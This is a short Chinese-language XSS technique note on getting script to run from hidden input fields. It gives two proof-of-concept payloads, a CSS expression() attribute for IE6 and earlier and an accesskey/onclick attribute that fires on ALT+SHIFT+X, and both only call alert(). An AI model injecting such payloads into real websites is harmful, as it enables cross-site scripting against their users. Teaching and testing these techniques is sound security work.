【XSS】input hidden

1、使用expression突破

<input type=hidden style="x:expression(alert(/xss/))">

直接利用CSS的expression属性来实现突破,此技巧适用于IE6及以下的浏览器。

2​、使用accesskey突破

<input type="hidden" accesskey="X" onclick="alert(/xss/)">

插入之后,使用ALT+SHIFT+X快捷键来触发XSS,此方法我在firefox下面测试通过,其它浏览器尚未可知。